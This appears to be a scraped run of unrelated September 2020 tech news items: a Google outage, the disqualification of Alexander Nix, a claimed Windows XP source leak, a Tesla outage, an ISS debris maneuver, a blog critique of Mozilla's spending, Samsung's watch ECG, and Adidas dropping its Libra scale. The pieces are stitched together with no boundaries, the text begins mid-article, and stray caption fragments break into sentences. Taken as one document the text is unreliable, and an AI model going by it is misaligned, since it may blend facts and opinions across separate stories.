Some, such as Gmail, were taking significantly more time to load while other services like Google’s Play Store and Calendar seemed to be on an endless boot-up loop and wouldn’t load at all. DownDetector currently shows outages for just about all of Google’s services in areas all over the world. According to the site, the bulk of reports are coming from Australia, the U.S., and east Asia, with users primarily having issues logging in.
We’ve reached out to Google for more info. Honestly, a worldwide Google outage is absolutely on-brand for the year we’re having so far, so I’m hardly surprised.
Update: 9/24/2020; 11:17 p.m. ET: Luckily, the problem appears to have been short-lived. An update from Google’s Cloud status dashboard showed that the issue across had been resolved “for most traffic” across Google’s services shortly after 10:30 p.m. ET.
Alexander James Ashburner Nix (45), from Holland Park, West London, has signed a disqualification undertaking, accepted by the Secretary of State on 14 September 2020.
Within the undertaking, Alexander Nix did not dispute that he caused or permitted SCL Elections Ltd or associated companies to market themselves as offering potentially unethical services to prospective clients; demonstrating a lack of commercial probity.
Effective from 5 October 2020, Alexander Nix is disqualified for seven years from acting as a director or directly or indirectly becoming involved, without the permission of the court, in the promotion, formation or management of a company.
Alexander Nix was a director of SCL Elections Ltd, a company that provided data analytics, marketing and communication services to political and commercial customers. He was also a director of five other connected UK companies: SCL Group Ltd, SCL Social Ltd, SCL Analytics Ltd, SCL Commercial Ltd, and Cambridge Analytica (UK) Ltd.
From 2016, SCL Elections Ltd was included in a rebranding of associated companies which then operated under the trading names Cambridge Analytica, CA Political (Global) and CA Commercial.
SCL Elections and the five connected companies, however, ceased trading following allegations in the UK and United States media which created substantial adverse publicity.
Some of the accusations against the companies related to allegedly offering potential clients unethical services.
All six companies entered into administration in May 2018 before entering into compulsory liquidation in April 2019. The companies’ insolvencies brought them to the attention of the Insolvency Service, who conducted investigations into the conduct of the directors.
Investigators’ enquiries confirmed that Alexander Nix had caused or permitted SCL Elections or associated companies to act with a lack of commercial probity.
The unethical services offered by the companies included bribery or honey trap stings, voter disengagement campaigns, obtaining information to discredit political opponents and spreading information anonymously in political campaigns.
Would you believe more than 1% of computers worldwide are still using Windows XP? Incredibly, there are still millions of people using 19-year-old operating system. And a recent development — if it bears out — is another reason people need to make the switch to something newer.
On Thursday, users on 4chan posted what they claimed was the source code of Windows XP.
Posting an image of a screenshot allegedly of the source code in front of Window’s XP iconic Bliss background, one user wrote ‘sooooo Windows XP Source code leaked’. Another Redditor helpfully has uploaded the code as a torrent, assisting in its spread.
While there is no confirmation that this code is definitely Windows XP, independent researchers have begun to pick through the source code and believe it stands up to scrutiny.
TESLA’s network completely dropped on Wednesday in a massive outage that left drivers unable to connect to their cars.
According to Electrek, internal systems were fully down and around 11am ET, leaving users unable to connect their vehicles to the mobile app.
3
Tesla users were unable to connect their cars to their mobile apps on WednesdayCredit: EPA
Tesla staff were also unable “to process deliveries and orders” and the company’s website wasn’t working.
The outage also hit Tesla solar and Powerwall, the company’s in-home batteries.
Breaking: Tesla is currently having a complete network outage. Internal systems are down according to sources. On the customer side, I can’t connect to any of my cars and website is not working. What about you? pic.twitter.com/fbj3s4SJC8
Yesterday, NASA and Russian flight controllers performed an “avoidance maneuver” to protect the International Space Station from a wayward chunk of space debris. This episode—already the third of its kind this year—highlights a growing problem and the importance of mitigating potential collisions in space.
Low Earth orbit (LEO) is vast and mostly empty, but when you have thousands upon thousands of objects zipping around at speeds over 6 miles per second (10 km/s), this space in space suddenly seems a lot smaller.
Such was the concern earlier this week when NASA, along with U.S. Space Command, detected an unknown piece of space debris that was expected to come uncomfortably close to the International Space Station. To safeguard the outpost and its crew, NASA and Russian flight controllers scheduled an impromptu “avoidance maneuver” to place the ISS out of harm’s way.
To do so, they fired thrusters belonging to Russia’s Progress 75 resupply spacecraft, which is currently docked to the Zvezda service module. Given the late notice, mission controllers had all three members of the Expedition 63 crew—Chris Cassidy, Anatoly Ivanishin, and Ivan Vagner—temporarily relocate to the Russian segment so they could be in close proximity to the Soyuz MS-16 spacecraft. NASA said this was done “out of an abundance of caution” and that “at no time was the crew in any danger.”
The piece of space junk was projected to pass to within 0.86 miles (1.39 kilometers) of the International Space Station, with the closest approach happening on Tuesday, September 22 at 6:21 pm EDT. The avoidance maneuver, which required just 150 seconds to complete, was performed about an hour earlier. NASA and Russian flight controllers worked in tandem to make it happen.
Once it was all over, the hatches between the U.S. and Russian segments were reopened and life resumed to normal.
Mozilla recently announced that they would be dismissing 250 people. That’s a quarter of their workforce so there are some deep cuts to their work too. The victims include: the MDN docs (those are the web standards docs everyone likes better than w3schools), the Rust compiler and even some cuts to Firefox development. Like most people I want to see Mozilla do well but those three projects comprise pretty much what I think of as the whole point of Mozilla, so this news is a a big let down.
The stated reason for the cuts is falling income. Mozilla largely relies on “royalties” for funding. In return for payment, Mozilla allows big technology companies to choose the default search engine in Firefox – the technology companies are ultimately paying to increase the number of searches Firefox users make with them. Mozilla haven’t been particularly transparent about why these royalties are being reduced, except to blame the coronavirus.
I’m sure the coronavirus is not a great help but I suspect the bigger problem is that Firefox’s market share is now a tiny fraction of its previous size and so the royalties will be smaller too – fewer users, so fewer searches and therefore less money for Mozilla.
The real problem is not the royalty cuts, though. Mozilla has already received more than enough money to set themselves up for financial independence. Mozilla received up to half a billion dollars a year (each year!) for many years. The real problem is that Mozilla didn’t use that money to achieve financial independence and instead just spent it each year, doing the organisational equivalent of living hand-to-mouth.
Despite their slightly contrived legal structure as a non-profit that owns a for-profit, Mozilla are an NGO just like any other. In this article I want to apply the traditional measures that are applied to other NGOs to Mozilla in order to show what’s wrong.
These three measures are: overheads, ethics and results.
Overheads
One of the most popular and most intuitive ways to evaluate an NGO is to judge how much of their spending is on their programme of works (or “mission”) and how much is on other things, like administration and fundraising. If you give money to a charity for feeding people in the third world you hope that most of the money you give them goes on food – and not, for example, on company cars for head office staff.
Mozilla looks bad when considered in this light. Fully 30% of all expenditure goes on administration. Charity Navigator, an organisation that measures NGO effectiveness, would give them zero out of ten on the relevant metric. For context, to achieve 5/10 on that measure Mozilla admin would need to be under 25% of spending and, for 10/10, under 15%.
Senior executives have also done very well for themselves. Mitchell Baker, Mozilla’s top executive, was paid $2.4m in 2018, a sum I personally think of as instant inter-generational wealth. Payments to Baker have more than doubled in the last five years.
As far as I can find, there is no UK-based NGO whose top executive makes more than £1m ($1.3m) a year. The UK certainly has its fair share of big international NGOs – many much bigger and more significant than Mozilla.
I’m aware that some people dislike overheads as a measure and argue that it’s possible for administration spending to increase effectiveness. I think it’s hard to argue that Mozilla’s overheads are correlated with any improvement in effectiveness.
Ethics
Mozilla now thinks of itself less as a custodian of the old Netscape suite and more as a ‘privacy NGO’. One slogan inside Mozilla is: “Beyond the Browser”.
Regardless of how they view themselves, most of their income comes from helping to direct traffic to Google by making that search engine the default in Firefox. Google make money off that traffic via a big targeted advertising system that tracks people across the web and largely without their consent. Indeed, one of the reasons this income is falling is because as Firefox’s usage falls less traffic is being directed Google’s way and so Google will pay less.
There is, as yet, no outbreak of agreement among the moral philosophers as to a universal code of ethics. However I think most people would recognise hypocrisy in Mozilla’s relationship with Google. Beyond the ethical problems, the relationship certainly seems to create conflicts of interest. Anyone would think that a privacy NGO would build anti-tracking countermeasures into their browser right from the start. In fact, this was only added relatively recently (in 2019), after both Apple (in 2017) and Brave (since release) paved the way. It certainly seems like Mozilla’s status as a Google vassal has played a role in the absence of anti-tracking features in Firefox for so long.
Another ethical issue is Mozilla’s big new initiative to move into VPNs. This doesn’t make a lot of sense from a privacy point of view. Broadly speaking: VPNs are not a useful privacy tool for people browsing the web. A VPN lets you access the internet through a proxy – so your requests superficially appear to come from somewhere other than they really do. This does nothing to address the main privacy problem for web users: that they are being passively tracked and de-anonymised on a massive scale by the baddies at Google and elsewhere. This tracking happens regardless of IP address.
When I tested Firefox through Mozilla VPN (a rebrand of Mullvad VPN) I found that I could be de-anonymised by browser fingerprinting – already a fairly widespread technique by which various elements of your browser are examined to create a “fingerprint” which can then be used to re-identify you later. Firefox, unlike some other browsers, does not include any countermeasures against this.
Even when using Mozilla’s “secure and private” VPN, Firefox is trackable by browser fingerprinting, as demonstrated by the EFF’s Panopticlick tool. Other browsers use randomised fingerprints as a countermeasure against this tracking.
Another worry is that many of these privacy focused VPN services have a nasty habit of turning out to keep copious logs on user behaviour. A few months ago several “no log” VPN services inadvertently released terabytes of private user data that they had promised not to collect in a massive breach. VPN services are in a great position to eavesdrop – and even if they promise not to, your only option is to take them at their word.
Results
I’ve discussed the Mozilla chair’s impressive pay: $2.4m/year. Surely such impressive pay is justified by the equally impressive results Mozilla has achieved? Sadly on almost every measure of results both quantitative and qualitative, Mozilla is a dog.
Firefox is now so niche it is in danger of garnering a cult following: it has just 4% market share, down from 30% a decade ago. Mobile browsing numbers are bleak: Firefox barely exists on phones, with a market share of less than half a percent. This is baffling given that mobile Firefox has a rare feature for a mobile browser: it’s able to install extensions and so can block ads.
Yet despite the problems within their core business, Mozilla, instead of retrenching, has diversified rapidly. In recent years Mozilla has created:
a mobile app for making websites
a federated identity system
a large file transfer service
a password manager
an internet-of-things framework/standard
an email relay service
a completely new phone operating system
an AI division (but of course)
and spent $25 million buying the reading list management startup, Pocket
Many of the above are now abandoned.
Sadly Mozilla’s annual report doesn’t break down expenses on a per-project basis so it’s impossible to know how much of the spending that is on Mozilla’s programme is being spent on Firefox and how much is being spent on all these other side-projects.
What you can at least infer is that the side-projects are expensive. Software development always is. Each of the projects named above (and all the other ones that were never announced or that I don’t know about) will have required business analysts, designers, user researchers, developers, testers and all the other people you need in order to create a consumer web project.
The biggest cost of course is the opportunity cost of just spending that money on other stuff – or nothing: it could have been invested to build an endowment. Now Mozilla is in the situation where apparently there isn’t enough money left to fully fund Firefox development.
What now?
Mozilla can’t just continue as before. At the very least they need to reduce their expenses to go along with their now reduced income. That income is probably still pretty enormous though: likely hundreds of millions a year.
I’m a Firefox user (and one of the few on mobile, apparently) and I want to see Mozilla succeed. As such, I would hope that Mozilla would cut their cost of administration. I’d also hope that they’d increase spending on Firefox to make it faster and implement those privacy features that other browsers have. Most importantly: I’d like them to start building proper financial independence.
I doubt those things will happen. Instead they will likely keep the expensive management. They have already cut spending on Firefox. Their great hope is to continue trying new things, like using their brand to sell VPN services that, as I’ve discussed, do not solve the problem that their users have.
Instead of diversifying into yet more products and services Mozilla should probably just ask their users for money. For many years the Guardian newspaper (a similarly sized organisation to Mozilla in terms of staff) was a financial basket case. The Guardian started asking their readers for money a few years ago and seems to be on firmer financial footing since.
Getting money directly has also helped align the incentives of their organisation with those of their readers. Perhaps that would work for Mozilla. But then, things are different at the Guardian. Their chief exec makes a mere £360,000 a year.
MS Edge and Google Chrome are winning the renewed browser wars and this kind of financial playing isn’t helping Firefox, who I really want to win on ethical considerations. It’s just not helping.
Samsung may have first made an ECG-capable smartwatch with the Galaxy Watch Active2, but it wasn’t until earlier this summer that it actually got clearance from the U.S. Food and Drug Administration to enable the medical-grade feature. That announcement came in dramatic fashion at its Unpacked event in August, where the company unveiled yet another ECG-capable smartwatch, the excellent Galaxy Watch 3. Still, even with clearance, we didn’t know exactly when the ECG feature would be available on either watch. Well, the answer is today.
“Beginning September 23, users will have access to yet another next-generation feature, as on-demand electrocardiogram (ECG) readings come to Galaxy Watch 3 and Galaxy Watch Active2,” Samsung said in a press statement. “This tool recently received clearance from the U.S. Food and Drug Administration (FDA) and will soon be available through the Samsung Health Monitor app when connected to a compatible Galaxy smartphone.”
It appears that Samsung’s ECG app will operate similarly to Apple’s. After opening the Samsung Health Monitor app, you’ll be advised to put your arm on a flat surface and place your finger on the top button. The watch will identify you as having either a normal Sinus Rhythm or atrial fibrillation. Once the reading is done, you can log symptoms like dizziness or fatigue. (Atrial fibrillation is often unaccompanied by symptoms.) You’ll also be able to send a PDF report to your healthcare provider.
The catch here is that, at least for now, the ECG app will only be available on Samsung Galaxy phones with Android Nougat or higher—meaning, if you have one of these watches paired to a non-Samsung Android phone or an iPhone, you’re out of luck. That’s only sort of surprising. While Samsung’s smartwatches are among the best currently available for Android users, Samsung is like Apple in that it likes to push its own ecosystem. As a result, some features are only available to Samsung phone owners. It looks like, for the time being, ECG is one of them.
Image: Samsung
Gizmodo reached out to Samsung to see if this feature might eventually make its way to non-Samsung Android phones. In response, a Samsung spokesperson said, “We’re always looking to address consumer feedback, however we cannot speak to additional phone compatibility outside of Galaxy smartphones at this time.”
While it’s great that Samsung’s ECG app is finally here, it is majorly disappointing that not all Android users will be able to access it. That means currently, in the U.S. only Apple and Samsung smartwatch owners have access to any sort of on-the-wrist ECG. The Galaxy Watch 3 felt like a real win for all Android users, but leaving non-Samsung Android users out of this update takes the shine off that a bit. Hopefully, Samsung will fix that going forward.
For non-Samsung Android users, the only FDA-cleared ECG smartwatch is the newly launched Fitbit Sense. However, Fitbit only just got clearance, meaning the ECG feature on the Sense is not live yet. You’ll have to wait until next month before it’s available. The good news is that Fitbit is platform-agnostic. Provided that there aren’t any delays, this means you’ll have at least one FDA-cleared ECG smartwatch option, regardless of what phone you use.
In 2015, German sportswear manufacturer Adidas acquired a plucky Austrian IoT startup called Runtastic, which, among other things, manufactured a $129.99 “smart” scale called Libra. Now that product is being discontinued, preventing owners from synchronising their data or even downloading the app required to use it.
In a post published yesterday, Adidas announced the discontinuation of key functionality from the Libra smart scale.
“We wanted to let you know that we’ve decided to stop supporting the Libra app. This means that we’ve taken the app off the market and that login won’t work anymore,” the company said. “A login and the synchronisation of your weight data from the Libra scale is no longer possible.”
Owners can still see how much timber they’ve put on during lockdown by glancing at the Libra’s LCD screen, much like they could with an ordinary £10 scale from Tesco. However, the core functionality that initially attracted them to the product is long gone.
While the Libra app is no longer searchable on the Google Play Store and Apple App Store, those who have previously downloaded it are able to visit its page, where they can still leave “feedback”. Predictably, this has prompted a flood of one-star reviews and furious comments.
El Reg has contacted Adidas for comment.
Users of Libra are not alone in having their expensive IoT kit discontinued after just a few years of ownership.
In April 2016, the servers supporting a smart home hub product called Revolv were shut down, leaving owners unable to control their other Wi-Fi-connected gizmos. This stung for a couple of reasons: firstly, the hub cost £210 and was explicitly sold with a “lifetime subscription”. Secondly, Revolv wasn’t a fledgling startup with tenuous cash flow, but rather a subsidiary of Alphabet – one of the largest and wealthiest companies on the planet.
Another shocking example comes from last year, when Den Automation, a crowdfunding sensation that raised $4.5m in equity crowdfunding for a family of smart plugs and light switches, entered administration. As it found itself unable to pay for server costs, people suddenly found themselves burdened with non-functional and hugely expensive kit.
The assets and intellectual property of Den Automation were subsequently acquired by a previous investor through a new company called Den Switches, which has said it intends to restart the service. It’s not clear when that will happen.
More recently, the Will.i.am-owned startup Wink sent out an email to users of its smart home products demanding they pay for a subscription service in order to continue using their products as the revenue obtained from one-time purchases of its equipment proved insufficient to support long-term maintenance.
The problem with most IoT products isn’t necessarily that they rely on back-end servers to run. It’s that, for the most part, it’s impossible to perceive the trajectory of a given company. Will they be acquired by new owners with aggressive cost-cutting strategies and leaner product roadmaps?
Or will they financially struggle, eventually swirling the toilet basin of insolvency, and leave nothing behind but a bunch of electronic waste and angry one-star app reviews?
